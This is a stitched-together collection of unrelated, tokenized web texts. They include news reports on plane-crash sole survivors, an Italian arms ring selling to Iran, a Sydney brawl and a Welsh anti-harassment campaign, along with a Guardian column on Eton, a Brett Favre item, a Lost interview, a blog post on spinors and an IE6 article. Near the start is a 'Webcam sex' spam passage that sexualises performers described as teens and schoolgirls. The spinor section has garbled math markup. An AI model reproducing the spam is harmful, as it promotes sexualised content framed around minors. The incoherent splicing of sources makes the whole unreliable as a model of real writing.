Finally , when he found Ebdon Allemon , a Cajun craftsman , he persuaded him to make the pirogue .
It may well have been the last piroque made in Louisiana .
This is a record of that event .
Webcam sex
Are you really going to have some quality time together with webcam women ?
You are to create your dream come true .
The teen cam is full of youthful lustful bodies , hot outfits and absolutely free taking and more .
You may have a lot of fun here only watching them live or even communication , where are such teen girls out of ?
All Around the World !
The most popular teen live camera is named Threesome .
It is the show where two permanent residents and their friends are talking , laughing and using quality webcam sex with no charge .
You can see the adolescent cam for free and see this youthful bodies making sex every day with all the passion and enthusiasm .
There are a good deal of fun here so people from all over the world are here communicating .
The women are lesbian and residing together but they are ready to expand their sexual horizons with the members of the conversation .
They can observe your cam , and are not merely having sex on camera but also making shows .
This teen cam is hosted by the hot blonde and her buddy .
You are able to see the massive boobies , there 's a good deal of fancy lingerie .
All the women are fond of fashion in the way that is sexy .
So people of this chat can appreciate all of the school girl looks and fancy stockings and even some hot flashes .
Webcam sex
( CNN ) --
Some will see it as divine intervention , others a simple quirk of fate , fortune or physics , but one boy 's cheating of death in an air crash in Libya this week adds another name to a small roll call of aviation disaster sole survivors .
The boy , identified as Ruben van Assouw , suffered multiple fractures in his lower limbs when the Afriqiyah Airways Airbus A330 - 200 crashed Tuesday at Tripoli International Airport killing 92 passengers and a crew of 11 .
Details of how Assouw , a Dutch national , emerged alive from such an appalling disaster are not yet known , but his survival has already been called a " miracle " by Jerzy Buzek , president of the European Parliament .
Statistically improbable , the fact of his survival is also unlikely to shed any light on the mysterious factors that increase the chances of escaping alive from a plane wreck .
Child is lone survivor in plane crash
Accounts of how many sole survivors there have been in the aviation industry 's relatively short history vary , but so rare is such an event that these are thought to number in their tens rather hundreds .
Most of these escapes have been attributed to unique circumstances , in some cases the sheer resilience and determination of the individual involved .
In many cases the survivors , though considered lucky by some , suffered horrific physical and psychological injuries .
Here are a selection of some of the sole survivors from the past five decades .
June 30 , 2009 -- Bahia Bakari , a 13 - year - old French national , was the only survivor when a Yemenia Airways Airbus A310 flight from Sanaa to Comoros missed the airport and crashed into the Indian Ocean killing 152 people .
Bakari was ejected into the water where , barely able to swim , she clung on to a piece of plane wreckage for nine hours .
She suffered a fractured collar bone and cuts to her face .
Read more
December 24 , 2007 --
When a small Cessna plane carrying four Americans crashed in bad weather in high altitude remote jungle in Panama , Francesca Lewis , 13 , was found alive two days later when rescuers finally reached the wreckage .
Despite being pinned upside down in her seat and dressed only in shorts and a T - shirt , she endured hypothermia and a broken arm .
Reports at the time credited her survival through freezing temperatures to piles of luggage that fell on top of her .
Read more
July 8 , 2003 -- Mohammed el - Fateh Osman , a two - year - old Sudanese boy was reportedly hailed by the country 's aviation minister as a " miracle dictated by God " after he survived a Boeing 737 crash in Port Sudan that killed 115 people .
The boy , who suffered burns in the crash , was said to have been found lying on a fallen tree by a nomad .
January 11 , 1995 -- Erika Delgado , 10 , lost her parents and younger brother among the 51 victims of an Intercontinental Airlines DC - 9 crash near Cartagena , Colombia , but escaped largely unscathed with just fractured bones .
Recalling the incident 25 years later , she tells CNN she regained consciousness half submerged in the Maria La Baja swamp and called for help .
Afterward she became a national celebrity , hailed as Colombia 's " Little Miss Miracle . "
August 16 , 1987 -- Shortly after takeoff in Detroit , Michigan , Northwest Airlines Flight 255 hit a light pole , crashing into the suburbs of Romulusa and killing 156 people on board and two people on the ground .
Cecelia Cichan , aged four , who had been traveling with her family , survived but with extensive burns .
Cichan reportedly remembers little about the crash , but a message attributed to her on a memorial site for crash victims says : " I never go a day without thinking about the people on Flight 255 . "
January 26 , 1972 -- Serbian flight attendant Vesna Vulovic survived a fall of 10,000 meters when the aircraft she was traveling in exploded in midair .
Vulovic , whose plunge was logged in the Guinness Book of Records , became a Cold War heroine in the Soviet Bloc , although some have since claimed the feat was fabricated as part of an official cover up .
Among the legends surrounding Vulovic was that her first words after being found were : " Can I have a cigarette ? "
December 24 , 1971 -- Juliane Koepcke was 17 when the Lockheed turboprop she was traveling in with her mother crashed in the Amazonian rainforest killing 91 people .
Koepcke describes falling three kilometers strapped into a row of seats before crashing into the jungle canopy .
Suffering a broken collarbone , concussion and severe lacerations , she endured a 10 - day trek wading through piranha and crocodile - infested rivers to reach safety .
She now works as a librarian in Munich , Germany .
Read more
December 16 , 1960 -- Stephen Baltz , an 11 - year - old from Illinois , was the only survivor when two passenger jets collided over New York .
Six people were killed on the ground , 83 aboard a United Airline plane and a further 44 on a TWA flight all perished in the disaster .
Baltz , who had been aboard the UA flight , suffered burns and smoke inhalation but was able to describe the crash before he died a day later .
Correction :
An earlier version of this story misstated Erika Delgado 's age and the circumstances of her rescue .
Too bad Eton is all boys , even in the sixth form .
For those of us still eager for the public school experience , the final leaders ' debate probably confirmed that , for all its lack of metrosexual trimmings – girls , an abbey , Louis Theroux – an Eton education has the edge over a Westminster one .
As for lingering concerns about the more heightened stigma of Eton in the classless world presaged by John Major , Cameron 's success confirms that , as Boris Johnson has demonstrated , the Etonian 's peculiar whiff of privilege can readily be overlaid by his many other , more significant properties .
Unassailable confidence , for instance .
Disarming sincerity .
Judicious charm .
Understated authority .
Brazen pisstaking .
Just before the last debate , for example , Cameron shyly vouchsafed , to one interviewer , the inspiration for the Big Society he found , as a schoolboy , in a place identified only as " Windsor " .
Here , he would " visit people " , " and do their shopping for them and jobs around the house " .
Here , perhaps , is a clue to the extraordinary longevity of the royal family : centuries of selfless , Etonian social work .
As things stand , then : Eton two , Westminster one .
Had the smooth , Fettesian Blair been competing instead of the socially maladroit Brown , the tournament could have doubled as the first - ever soft - skills It 's a Knock Out .
Yet as Brown 's nemesis , Mrs Duffy , reminded us , when she heard of her snubbing , he , too , is " an educated man " .
Even without the private school burnish , Brown 's abilities , courtesy of his background and a fast - track through an academic grammar school , gave him advantages that now escape thousands of children , particularly the 40 % who leave without five adequate GCSEs .
What the prime minister lacks in poise , he makes up for with aggressive intellectual confidence .
In fact , at the same time that they increased to the importance of character in modern elections , the television debates demonstrated the benefits of a classy education in the creation of a character with the required fluency , confidence and self - esteem .
If , as some rightly argue , these all - male events have repeatedly exposed the outrageous under- representation of women in public life , they have also advertised the difficulties still to be surmounted by anyone , male or female , from one of Labour 's " bog standard " ( to use the official term ) comprehensives , when forced on to a public stage with a Cameron , Brown or Clegg .
Supposing they can get anywhere near it .
Last year , after years of bleating about social mobility , Brown asked Alan Milburn to produce a report on the subject .
It concluded that Britain is one of the least socially mobile countries in Europe , largely due to educational inequalities .
One in six parents , Milburn said , could not get their children into a decent school .
" The problem is not a shortage of parental aspiration .
It is a shortage of good schools . "
In the three decades since Jim Callaghan feared , in his Ruskin College speech , for the prospects of the poorest children , how much has changed ?
The Sutton Trust has just affirmed that " children 's levels of achievement are more closely linked to their parents ' background in England than in many other developed nations " .
In a new report , " Educational mobility in England " , it concludes that , despite " some improvement " during the Labour years , " major inequalities persist " .
Echoing Milburn , it stressed " high levels of social segregation in English secondary schools " as an obstacle to progress .
This coincided with news from Cambridge , that the number of state school pupils admitted dropped by 1 % last year .
The university 's imminent introduction of the A* grade , in order to distinguish between the ever - increasing numbers of children with A grades , there is every chance that this will , again , work against candidates from state schools , particularly those secondaries which do not select , or band , or draw their pupils from middle - class catchments .
Combined with the de-stigmatisation of Cameron ( which was partly forced by the privileged educational histories of Labour ministers such as Balls and Harman ) , and the enhanced visibility of those fine Westminster products , Clegg and Huhne , the extraordinary value of a private education has not been affirmed like this since Tony Blair took over from Wilson , Heath , Callaghan , Thatcher and Major , making him the first independently educated prime minister for 33 years .
Whatever happens this week , it is likely , given the continuing professionalisation of politics , that the overall proportion of privately educated MPs will , in common with the law , medicine and academe , be quite hideous enough to reinforce the choices of parents who have , like me , sought this advantage for their children , and to enrage parents who either despise this option or are otherwise obliged , in the absence of adequate cash , or faith or wangling ability , to educate their children in a borough ( like mine ) where the secondary schools are shunned even by local Labour politicians .
Although , to be fair to my MP , the wealthy Emily Thornberry , I understand she managed to secure some of a handful of places that are reserved for her constituents at an outstanding state secondary situated on the far side of the M25 and is therefore qualified to live the local educational dream : fabulous life chances at no additional cost .
We know by now that a victorious
Tory party will contain so many privately educated MPs as to make inevitable the introduction of a uniform , Eton fives and a house system ( something the working classes might wish to emulate when they commence setting up their new free schools ) .
Less predictably , the Guardian has reported that , of 40 Lib Dem candidates for the party 's top target seats in this election , just under half went to fee - paying schools , including two Etonians .
Tony Travers from the LSE commented : " It is only in Britain that we could have the great revolution led by a group of people who , in background and experience , are more like the existing parties than any other organisation in the country . "
But unlike the Labour party , whose dignitaries prefer to gain educational advantage by property transactions or parental piety , Clegg 's Lib Dems have , at least , placed social mobility at the top of their manifesto .
Their plan is to target funds on struggling pupils and to cut class sizes .
While this , presumably because it would upset so many parents , does not begin to address the partial or covert selection that undermines so many state comprehensives , it improves on present neglect , on the Tories ' DIY plan , and in many ways Labour 's persistent requirement that universities adapt to suit children who have been betrayed by its chaotic secondary education , " widening participation and boosting social mobility " .
If only the same duty could have been imposed on the professions , they might have got somewhere .
As it is , the debates have foreshadowed the result of Brown 's " great moral endeavour " , his self - styled " crusade for social mobility " : government by patricians .
How happy this would have made Harold Macmillan who complained that Mrs Thatcher had more Estonians in her cabinet than Etonians .
進歩への叙情詩 by David Rothscum
オリジナル はAn ode to Progress by David Rothscum Saturday , April 17 , 2010 David Rothscumさんの記事目次おまけ＋＋やは りDavid Rothscum さんは、専門領域も感性も私と似た人であるようです。また近々記事紹介を再開しますのでよろしく。
MILAN – The Italian businessman sounded worried on the wiretap .
Alessandro Bon was a politically connected entrepreneur and former sales representative for Beretta , the Italian gun manufacturer .
But behind that facade , he was leading a ring of Italian arms dealers and Iranian spies who were illegally selling ammunition , helicopters and other military hardware to Iran , according to Italian court documents obtained by ProPublica .
As investigators listened in October , Bon gave one of his associates bad news : Some German sniper scopes they had sold to Iran had surfaced among Taliban militants fighting NATO troops in Afghanistan .
" You want to know where they found two of the sniper scopes , between you and me ? "
Bon said , according to a transcript of the call .
" In Afghanistan … They fired on German soldiers with two of the sniper scopes and the serial numbers were traced … and the [ German ] police are investigating because they were in the hands of the Taliban … I wonder what the hell they were doing in Afghanistan . "
Bon did n’t know it , but he had problems closer to home .
His alleged clandestine business had already caught the eye of Italian authorities , who in March arrested him , four other Italians and two alleged Iranian intelligence officials .
Two more Iranians remain fugitives .
All nine are charged with violating international embargoes barring sales of arms and military technology to Iran .
All have denied wrongdoing .
The case has been reported in Italy , but transcripts of wiretaps , in court documents obtained by ProPublica , offer a rare inside look at Iran 's aggressive global campaign to buy prohibited deadly goods .
Using layers of front companies and smuggling pipelines run by Iran ’s increasingly powerful security forces , Iranian buyers prowl black markets in search of suppliers ready to take a risk for a profit , according to investigators and Western intelligence officials interviewed for this article .
U.S. - led international sanctions have n’t stopped the illicit sales , experts say , because European countries have longtime commercial ties to Iran and are n’t inclined to crack down , particularly in the current economic slump .
Italy alone did more than $ 9 billion worth of legitimate trade with Iran in 2008 .
Most countries " do not devote significant resources to investigating or prosecuting export control violations , " wrote Michael Jacobson , a fellow at the Washington Institute for Near East Policy , in an article published by the think tank last year .
A " public prosecutor has stated that his country has only uncovered ‘ the tip of the iceberg ’ of the black market activity involving Iran ’s nuclear program . "
Jacobson continued , " the European Union is not in a position to oversee the shortcomings of its member states in this area . "
The Milan arms ring operated undetected for at least three years , authorities say , allegedly moving – or trying to move – sniper scopes , various types of munitions , explosive chemicals , helicopters , parachutes , helmets and scuba gear worth millions of dollars .
The cast of characters includes a political boss known as a " bulwark of Christ , " an Iranian journalist turned accused spy and a fast - talking lawyer with an alleged audacious plan to set up a covert Iranian base in Italy .
Emanuele Ottolenghi , a Brussels - based senior fellow for the Foundation for Defense of Democracies , said the Milan prosecution stands out because it is unusual for European authorities to dismantle an Iranian arms procurement network .
" It is infinitely easier for Iran to break the rules than it is for law enforcement and the judiciary to put together a case , " said Ottolenghi , author of " Under a Mushroom Cloud : Europe , Iran and The Bomb . "
The Italian suspects had experience in the Middle East arms market and links to Italy ’s political and corporate elite .
They saw no reason to stop doing business despite a European Union ban on military trade with Iran in 2006 and a United Nations ban in 2007 , investigators say .
The Hunt Begins
The network ’s troubles started in June when the suspects strayed into the sights of two top law enforcement agencies : a Milan unit of the Financial Guard , the Italian police force that investigates customs and tax - related crimes , and a prosecutors ’ office with a tradition of pursuing corruption and terrorism cases .
The prosecutor in the case , Armando Spataro , led a historic investigation that ended in November with the conviction of two dozen CIA officials , in absentia , for the abduction of an Egyptian cleric here in 2003 .
Spataro ’s prosecution also helped topple high - ranking officials of Italy ’s foreign spy agency , worsening tensions with the administration of Prime Minister Silvio Berlusconi , a frequent critic of Italy ’s independent - minded prosecutors .
The lead about the arms trafficking scheme came from Romanian customs officials , who were embroiled in a court fight with Bon , the Italian entrepreneur , over a shipment of 200 German sniper scopes .
The merchandise had been confiscated in 2008 at the Bucharest airport en route to Iran .
Bon , 43 , went into business on his own about five years ago after working in exports for Beretta , the firearms giant .
He lives in Monza , a prosperous , politically conservative town near Milan .
According to an investigative report in an arrest warrant , Bon and an associate had sent the sniper scopes to a Romanian front company to mask the final destination : Iran .
Investigators found an e-mail from Bon with instructions to the Romanian shipping agent : " You will find attached the bill for the Consignee in Teheran .
THE BILL MUST NOT ACCOMPANY THE MERCHANDISE !!! "
The Financial Guard began wiretapping Bon and his associates , enlisting the help of Italy ’s domestic intelligence agency and police in other countries to trace the web of smuggling routes .
Within weeks , investigators had reason to believe that the Italian arms dealers were hatching brazen multimillion - dollar deals with Iranian spies .
The Iranian Connection
The Financial Guard identified the main arms buyer as Bakhtiyari Homayoun , a suspected Iranian intelligence official who shuttled between Europe and Tehran .
Homayoun , 46 , ran a front company in Tehran that was one of several Iranian firms operating as a government procurement network , according to the investigative report .
A hard - nosed negotiator , he chewed out his Italian partners when they pestered him about debts or failed to deliver the goods .
In early August , Homayoun pressured Bon to free the blocked sniper scope shipment in Bucharest and get it to Iran .
The Iranian complained that he was feeling heat from higher - ups to close the deal , according to a wiretap transcript .
" This is coming from the minister ’s office , I ca n’t do anything , " Homayoun told Bon in English .
" You know that the minister changes next week .
Everything will be different next week , so they want to finish everything before leaving their posts . "
Homayoun ’s shopping list offers insight into the goals of Iran ’s procurement networks and its ties to Islamic militants .
Western intelligence officials say many of the munitions , explosives and other arms he ordered were probably intended not for the conventional military , but rather for proxy forces that are believed to be supported by Iran : the Iraqi insurgency , Hezbollah in Lebanon and Hamas in the Gaza Strip .
U.S. military chiefs also have accused Iran of providing military assistance to the Taliban .
Financial Guard officers are investigating the clues about how sniper scopes ended up in the Taliban ’s arsenal .
They are also pursuing leads that some of the 1,000 sniper scopes Homayoun bought , paying up to $ 2,600 each , may have reached insurgents in Iraq .
According to the investigative report and Italian officials , British troops discovered the same kind of scopes in Iraqi militant hideouts in Basra in 2006 and 2007 .
The Investigation Widens
The wiretaps of the calls between Homayoun and Bon soon opened an unexpected door into a dark side of Italian politics .
On Aug. 22 , Bon complained that an Italian associate had jeopardized the group ’s relationship with a mysterious political protector by failing to cough up a kickback .
" Every six months he has to pay a politician in Italy and he has not paid him yet , " Bon explained , according to the investigative report .
" And I need the support of this politician , so send me the money and I will put aside the money for the politician . "
The politician is identified in a prosecutor ’s report and by investigators as Pier Gianni Prosperini , 64 , a powerful boss in the Lombardy region .
Prosperini is also suspected of brokering arms deals with Eritrea , which like Iran has been accused of supporting Islamic extremist groups , according to the prosecutor ’s report .
The burly Prosperini leads a far - right , anti-immigrant party .
Campaign posters depict him in medieval warrior ’s attire defending a castle , sword in hand and crucifix on chest .
They describe him as a " bulwark of Christ " and " scourge of Islamic terrorism and criminality . "
Prosperini denies being involved in arms trafficking , according to his lawyer , Ettore Traini .
" We have heard that a politician is mentioned in the investigative documents related to Iran , but we do not know that it is him , " Traini said in an interview .
" We have not been formally notified of those allegations because the investigation remains secret . "
A few weeks after the political lead emerged , the investigation changed directions again .
Investigators listened in disbelief as their wiretaps detected another apparent Iranian spy – this one a veteran television correspondent based in Rome .
Acquaintances describe the correspondent , Hamid Masoumi , as a quiet , polite 50 - year - old .
He has lived in Italy since 1993 , speaks fluent Italian and moved in influential Roman circles .
The wiretaps exposed Masoumi as a " high - ranking operative of the Iranian secret intelligence services , " according to the investigative report .
As part of his covert activities , he sometimes presented himself as an employee of Iran ’s national airline and often operated out of the Iranian embassy , according to the report .
He also denied the accusations ,
The senior investigator in the case told ProPublica that Masoumi co-founded the front company in Romania with one of Bon ’s associates .
The company officially dealt in telecommunications equipment , but it completed only one transaction , the investigator said : the export of the 200 Schmidt & Bender sniper scopes that were blocked at the Bucharest airport .
" Why is Masoumi , a TV journalist , involved in a Romanian front company ? " the senior investigator said .
" How does the Iranian government explain that ? "
Following instructions from an Iranian embassy official in Rome recorded during wiretapped calls , Masoumi also spied on critics of Iran , prosecutors allege .
He grilled an Italian journalist who had contributed to a book about Iran ’s opposition movement , asking if any Iranian exiles were among the authors , according to the investigative report .
" Are there any Iranians involved ? " Masoumi demanded during a phone conversation in September .
" Are there any Iranian names ? "
Masoumi ’s intrigues enabled him to " soften " Italian news coverage of the Iranian regime ’s violent repression of the opposition , according to the prosecutor ’s report .
Intercepted communications with Italian journalists show that Masoumi promised them visas to Iran and access to officials if they would tone down negative reports about Iran , the prosecutor ’s report says .
The Talkative Son
As investigators pored over hours of phone calls and e-mails , a picture emerged of a group that was simultaneously sophisticated and undisciplined .
The suspects bickered over money and muscled each other out of deals .
The Italians called the Iranians " penguins " behind their backs , apparently referring to their taste for black and white outfits .
The Italians discussed apparent criminal activity at length with friends , wives and mothers .
In Monza , Bon kept his mother well informed , though she has not been charged .
He spilled the beans about the intercepted shipment in Bucharest during a wiretapped call in October : " Mamma , the merchandise was going directly to Iran . "
Bon seemed well aware of laws against military sales to Iran , according to the investigative report .
On Oct. 8 , he e-mailed a company in Taiwan inquiring about micro-cameras , miniature recording devices and other spy - gear .
He claimed his client was an " Italian anti-terrorist intelligence unit , " according to an intercept transcript
A representative of the company wrote back asking if the spy - gear was really for the Italian police .
She explained that she had just received an identical request from a broker for the Iranian government .
The transcript says
Bon responded indignantly : " I really do n’t know what Iran is doing since this nation is under embargo by our nation and most Western nations .
Our company works only with the Italian police and armed forces . "
Bon promptly contacted a second Taiwanese company about the same products and forwarded the data to Homayoun in Tehran , according to the investigative report .
Bon ’s lawyer , Nadia Germana , disputes the charges .
" His version differs greatly from the allegations by the prosecution , " Germana told ProPublica .
" He looks forward to explaining his point of view .
There is a question of interpretation about what constitutes military arms . "
Bon ’s 39 - year - old girlfriend , Danila Maffei , allegedly helped send four shipments of sniper scopes to Iran through Switzerland , according to the investigative report .
Swiss authorities did n’t notice anything amiss until the Iranians tried to return some of the merchandise via Switzerland in August 2007 , saying it was defective .
Swiss officials confiscated the shipment .
The Big Lawyer
The case gathered momentum in December when Masoumi , the Iranian journalist in Rome , organized an Italian suspect ’s trip to Tehran for a sit - down about lucrative deals .
Masoumi described Raffaele Rossi Patriarca as a " big lawyer from Italy " with " big clients " during calls to a Tehran associate , who worked with the Iranian foreign ministry and secret services to prepare the visit , according to the investigative report .
Patriarca , a prominent 45 - year - old lawyer based in Turin , comes off as brash in the recorded conversations .
During a call home from Tehran on Dec. 8 , the lawyer bragged that he had just met with a " highly decorated Iranian general " about a $ 20 million sale of nine helicopters , according to a wiretap transcript .
The wiretaps show he also discussed offering the Iranian brass a 747 cargo jet , fuses for munitions and explosive chemicals – and that he outlined a startling proposal to create a secret Iranian operations base on Italian soil .
" I will present them with what I think will make it easier to manage all their requirements , " he said .
" The acquisition of a company in Italy … with a certificate of incorporation and bank account … with a building in an airport … with two hangers that have direct access to the roadside … . the possibility of converting conference rooms and creating sleeping quarters …
If they have a minimum of entrepreneurial vision … they ’ll hit the jackpot , a total bingo . "
Patriarca denies wrongdoing .
His lawyer says the trip to Iran did n’t involve banned military equipment .
Patriarca ’s aggressiveness aggravated Iranians and Italians alike , but he made things happen , according to the investigative report .
At one point he took two Iranian suspects to Norway in a determined hunt to rent them a helicopter , reminding them to conceal the fact that the Iranian government was the true client , according to the investigative report .
In a more vulnerable moment , though , the lawyer checked to make sure his ventures had the blessing of apparently influential figures in the Italian capital , according to a wiretap transcript .
" Listen , is everything set with Rome ? " he asked another suspect as he prepared to leave for Tehran .
" It ’s not that I want to disrespect anyone … it ’s just for my peace of mind and the peace of mind of those I leave at home … I ’m leaving a wife and two kids at home . "
The vaguely mentioned power players in Rome have not yet been identified , investigators say .
The Downfall
A week after the lawyer ’s trip to Tehran , the ring suffered a major blow .
Prosperini , the political boss whom the Italians allegedly paid for protection , was arrested in a separate corruption scandal involving government contracts .
Prosperini has agreed to a plea bargain in that case .
He has not been charged with arms trafficking , but is still under investigation for suspected links to the Milan ring .
The politician ’s downfall stunned the accused Italian traffickers , who prosecutors suspect are involved in Prosperini ’s alleged arms deals with Eritrea .
Bon , his mother and others expressed " very grave concern " about the arrests during phone calls , according to the prosecutor ’s report .
" I do n’t know what the hell to do , " Bon said on Jan. 13 , according to a wiretap transcript .
" I ’m also anxious . "
Over the next few weeks , the phone conversations grew tense .
The quarrels with the Iranians got worse .
Patriarca ’s relentless deal - making alarmed the others , according to the investigative report .
" Raffaele called me yesterday , he told me he ’s coming up to see you with a squad of penguins , " or Iranians , an agitated Bon told an Italian suspect in a wiretapped call .
" I told him if you want to go to jail that ’s your damn problem … I ’m terrified around him , I swear . "
The suspect told Bon : " What worries me is the day … that they fit him with new bracelets , " meaning handcuffs .
Less than two months later , seven of the nine suspects were in handcuffs .
The Italians have all denied any wrongdoing , and Iran ’s foreign minister , Manoucher Mottaki , has rejected the charges against the four Iranians .
He denounced the arrests as an " immature and politically motivated " attack by the Italian government .
HATTIESBURG , Miss . --
Brett Favre says he still is n't sure what he 's doing next season , but he may have given some indication after visiting with the Southern Miss baseball team .
The Minnesota Vikings quarterback told the Golden Eagles on Thursday morning that if they can make it back to the College World Series for the second straight year , he will return for one more season in the NFL .
Favre has left fans hanging since the Vikings lost to New Orleans in the NFC Championship Game .
He signed a two - year contract with the Vikings before last season .
Coach Brad Childress has n't talked with Favre recently except by text message .
Southern Miss players have a lot of work to do if they want to force Favre into action .
They are 30 - 20 and need wins to earn a postseason invitation .
" It will address some of the issues , like the food drops , and it will deal with what happened on the island after Hurley took over and how he handled things , " Garcia reveals of the DVD bonus feature he shot .
" It will give you a taste of what took place after Hurley took over as the new number one .
There 's a little epilogue thing going on with the DVD . "
That little epilogue will be available to fans when Lost : The Complete Collection is released on DVD and Blu-ray August 24 .
Inside sources also told me that Walt ( Malcolm David Kelley ) will be shown in the bonus material .
" We 'll find out what happens to Walt , " says the insider .
But when asked who else he worked with , Jorge replied coyly : " There are other people in it , but I 'm not going to tell you who . "
Hmmm !
So now that he 's done with the show and can really tell us what he thought of the controversial series finale , what does Jorge have to say ?
" I loved it , " Jorge says .
" When I first got the finale script , it did n't have the final act in it yet .
But I got to the part where Hurley takes over and there was a kind of a sigh of relief .
I thought OK , this ending is a satisfying ending for me .
Everything I invested in this show does pay off .
And so I 'm good , the ending is good , and I do n't have to worry about it . "
And though many viewers did n't see that twist coming — that Hurley was named the protector of the island after Jack decided to sacrifice himself — Jorge says he and Matthew Fox both had a sneaking suspicion .
" During the whole season , Matt Fox and I were going back and forth , going , ' It 's going to be one of us , it 's not going to be one of them , its got to be one of us . '
So yeah , I liked it [ the ending ] , it was quite heavy . "
Now that Lost is gone for good , Jorge says he 's ready for another TV acting gig , when the time is right .
" Because of the success of Lost I am able to be a little bit picky , which is nice , " Jorge admits .
" I have been sent three or four scripts for television series , but there was n't anything I really wanted to do .
I want to tell a good story , whether it 's a TV show , a movie , whatever .
That 's really my No. 1 criteria . "
Spinors in three dimensions
At last I think I understand what this strange business with spinors is really all about .
Everybody knows that it has to do with SU ( 2 ) being a double cover of SO ( 3 ) of course , but I think I finally comprehend why .
SO ( 3 ) is the group of proper rotations in 3D space .
For instance , a rotation around the $ z$ - axis by angle $ \theta $ can be represented by the following matrix product :
\[\begin{pmatrix}x'\\y '\\z'\end{pmatrix} = \begin{pmatrix} \cos\theta& - \sin\theta&0\ \ \ sin\theta&\cos\theta&0\ \ 0&0&1 \end{pmatrix}\cdot\begin{pmatrix}x\\y\\z\end{pmatrix} .\]
Yet there 's another way to represent the same rotation using matrix algebra .
We can arrange the coordinates into a 2×2 complex matrix and perform the following multiplication :
\ [ \begin{pmatrix} iz '&y '+ix '\\ - y'+ix '& - iz ' \end{pmatrix} = \begin{pmatrix}e^{i\theta/2}&0\\0&e^{-i\theta/2}\end{pmatrix} \cdot \begin{pmatrix}iz&y+ix\\-y+ix&-iz\end{pmatrix}\cdot \begin{pmatrix}e^{-i\theta/2}&0\\0&e^{i\theta/2}\end{pmatrix} .\]
If you carry out the computation ( not too difficult ) you 'll find that this representation of a spatial rotation is equivalent to the previous representation .
And it can be easily generalized to an arbitrary rotation ( though the calculations tend to get more tedious ) .
What we find is that the complex matrix used to represent a rotation will be a unitary complex matrix ( unitary meaning that when multiplied by its own conjugate transpose , the result is the unit matrix ) of determinant +1 .
These matrices form a group under matrix multiplication : the group is called SU ( 2 ) .
In other words , SU ( 2 ) is equivalent to SO ( 3 ) .
Well , almost .
Whereas in the first representation , there 's precisely one matrix that corresponds to a particular spatial rotation , in the second representation there are two :
\[\begin{pmatrix}e^{i\theta/2}&0\\0&e^{-i\theta/2}\end{pmatrix}{\rm~~and~~} \begin{pmatrix}-e^{i\theta/2}&0\\0&e^{-i\theta/2}\end{pmatrix} = \ begin{pmatrix}e^{i\theta/2+\pi}&0\\0&e^{-i\theta/2-\pi}\end{pmatrix} \ ]
both correspond to the same rotation , since the minus sign , occurring twice , will cancel .
Another way of putting this is that SU ( 2 ) is a double cover of SO ( 3 ) .
If $ \vec { B} $ is an element of SU ( 2 ) and $ \vec {V} $ is the 2×2 complex matrix representation of a set of coordinates , the rotation can be written up as $ \vec { B}\cdot\vec{V}\cdot\overline{\vec{B}}$ .
So far so good .
These matrices can be used to represent a rotation in 3D space ; i.e. , a coordinate transformation that corresponds to a proper rotation of the coordinate system .
In which case it is customary to talk about covariant and contravariant quantities , i.e. , quantities that transform differently under a coordinate transformation .
What spinors make possible is to define a third type of quantity .
One that transforms according to $ \vec{ B}\cdot\vec {V}$ , i.e. , " one half " of a rotation if you wish .
Or ( I think Penrose called it that ) the " square root " of a rotation .
A quantity like this is called a spinor .
The most notorious property of a spinor of course is that when $ \theta$ is 360 º , the spin matrix is not the identity matrix , so it takes a rotation of 720 º in order for a spinor to return to itself .
Needless to say , all this stuff can be generalized to higher dimensions , but not arbitrarily .
The correspondence between SU ( 2 ) and SO ( 3 ) is accidental .
In general , the dimensionality of SU ( $ n$ ) is $ n ^ 2 - 1 $ , and the dimensionality of SO ( $ m$ ) is $ m ( m - 1 ) / 2 $ , so corresponding pairs of $ n$ and $ m$ can be found by solving the Diophantine equation $ 2( n ^ 2 - 1 ) =m ( m - 1 ) $ .
Solutions include the trivial SU ( 1 ) = SO ( 1 ) ( both groups consisting of the single 1×1 " matrix " ( 1 ) ) , $ n=2 $ and $ m=3 $ , and $ n=4 $ , $ m=6 $ ( SU ( 4 ) and SO ( 6 ) are isomorphic , i.e. , one is not a double cover of the other ) .
There are also solutions to this equation that do not result in a covering at all .
In other words , these kinds of spinors are a rather special counterpart to 3D rotations .
They may , in fact , provide a glimpse into that great unanswered mystery : why is the space we live in 3 - dimensional ?
So what are spinors for anyway ?
Quantities that transform like a spinor appear in quantum mechanics : the coefficients in the Dirac - equation form a spinor , for instance , because when you rewrite the equation under a change of coordinates , in order for it to remain invariant , the Dirac - coefficients must transform as spinors do .
A man has been left in a coma following a pitched brawl in Sydney 's CBD involving around 30 people .
The 31 - year - old man from Greenacre , in Sydney 's southwest , was found lying on the ground at the corner of Sussex and Goulburn streets after the fight broke out between drinkers at the Star Hotel about 5.30 am ( AEST ) today .
The man suffered serious head injuries and underwent surgery at Royal Prince Alfred Hospital , where he remains in a coma .
His condition this afternoon was reported as critical and his family were at his bedside .
Detective Inspector Peter Houlahan told reporters in Sydney that information on the attack was " scant " - the only CCTV footage available showed the victim already on the ground .
In spite of its weak security , poor performance , and woeful standards compliance , a lot of people are still using Internet Explorer 6 as their Web browser of choice .
A large part of this user base seems to be made up of corporate users .
According to Stuart Strathdee , Chief Security Adviser at Microsoft Australia , one of the reasons for this continued usage is that companies have found a virtue in one of the browser 's biggest flaws : it does n't work properly with social networking sites like Facebook .
Rather than using a secure browser and creating corporate — or firewall — policies to block unwanted time - wasting sites , companies are depending on the browser 's increasing obsolescence to render the sites unusable .
This allows IT managers to keep users out of YouTube without having to actually confront the users they are supposed to be supporting ; it's the sites ' fault that Internet Explorer 6 does n't work , not the IT department 's fault for foisting that legacy browser on its users .
With major online Web services like Gmail and Google Docs increasingly choosing to ignore Internet Explorer 6 , however , this strategy could start to backfire .
And , given Internet Explorer 8 's improved performance and security , Microsoft customers are advised to upgrade and find some other way to keep the pleasures of Farmville at bay .
Image caption
The television advert shows two men in a bar making sexist remarks
A campaign across Wales to combat violence against women is challenging men to abandon any " demeaning " attitudes they hold .
A TV advert shows " abusive " behaviour towards a woman , including being leered at and enduring sexist comments .
Social Justice Minister Carl Sargeant said while that could seem harmless to men , women can feel threatened .
Welsh Women 's
Aid said tackling " widespread social attitudes " was crucial .
The advert shows a gang of men in a van sounding their horn and gesturing at the woman in the street , a male office colleague ogling her , and two strangers in a bar making suggestive remarks as she passes .
The video ends with her being followed down a dark street by another man , with the headline One Step Too Far .
It then asks : " To you it 's nothing , but it all adds up .
Where does ' harmless ' end and ' abusive ' begin ? "
The Welsh Assembly Government said the campaign aimed to " stamp out unacceptable attitudes and behaviour towards women before it leads to more violent forms of abuse " .
It said it did this by highlighting " how seemingly innocent actions may be a step too far and lead to women feeling unsafe " .
' Epidemic social problem '
